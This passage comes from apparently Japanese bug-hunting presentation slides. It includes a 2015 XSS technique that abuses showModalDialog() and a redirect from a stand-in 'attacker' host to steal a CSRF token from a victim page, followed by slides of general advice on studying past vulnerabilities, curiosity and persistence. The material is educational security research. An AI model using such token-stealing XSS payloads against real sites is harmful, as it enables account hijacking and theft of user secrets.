  89. 89. showModalDialog()を つかったバイパス(2015) http://attacker/opener.html <script> ret=showModalDialog("redirector"); alert(ret); </script> http://attacker/redirector Location: ヘッダでリダイレクト http://victim/xss?q=";[code]// <form name=form> <input type=hidden name=token value=f9d150048b> </form> <script> var q="";returnValue=form.token.value//" </script> http://masatokinugawa.l0.cm/2015/06/xss6.html詳細は:
  90. 90. ハントの秘訣 [ 過去の失敗を知ろう ] 過去の修正済みの脆弱性をじっくりみてみよう 修正後に詳細情報が公開されているものはたくさんある 大抵の脆弱性は形を変えたよく似た失敗 探すべきポイントがみえてくる
  91. 91. 僕が心がけていること 「知らなきゃ」より「知りたい」でうごく 流行だけを気にしない 古くて誰も使っていないような技術でも調べてみる
  92. 92. 最後に バグハントに一番必要なもの 根気
  93. 93. さあ、 バグハントに出掛けよう!

×